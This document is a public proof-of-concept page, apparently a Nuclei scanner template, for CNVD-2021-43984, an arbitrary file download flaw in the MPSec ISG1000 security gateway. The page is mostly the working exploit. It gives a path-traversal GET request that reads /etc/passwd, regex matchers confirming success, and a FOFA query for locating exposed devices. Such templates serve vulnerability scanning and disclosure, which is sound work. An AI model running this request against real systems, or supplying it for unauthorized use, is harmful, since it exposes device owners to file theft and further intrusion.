漏洞描述
The MPSec ISG1000 safety gateway at MP Communications Technology Co., Ltd. has any file download loophole, and attackers can use the loophole to obtain sensitive information.
CNVD-2021-43984: MPSec ISG1000 Security Gateway - Arbitrary File Download
PoC代码[已公开]
id: CNVD-2021-43984
info:
name: MPSec ISG1000 Security Gateway - Arbitrary File Download
author: DhiyaneshDk
severity: high
description: |
The MPSec ISG1000 safety gateway at MP Communications Technology Co., Ltd. has any file download loophole, and attackers can use the loophole to obtain sensitive information.
reference:
- https://www.cnvd.org.cn/flaw/show/CNVD-2021-43984
- https://github.com/chaitin/xray/blob/master/pocs/mpsec-isg1000-file-read.yml
metadata:
verified: true
max-request: 1
fofa-query: "迈普通信技术股份有限公司"
tags: cnvd2021,cnvd,mpsec,maipu,lfi,isg
http:
- method: GET
path:
- "{{BaseURL}}/webui/?g=sys_dia_data_down&file_name=../etc/passwd"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: word
part: header
words:
- "text/plain"
- "USGSESSID="
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022100c7e7954c0d2a2eccf6460b6081fc4e9ae1c225eb21c404e32f103569dfe7b5a902207e3b8c49a81d414a00719b6468b60e6eb59627a9dff1c24cff31d33c4a09fd8c:922c64590222798bb761d5b6d8e72950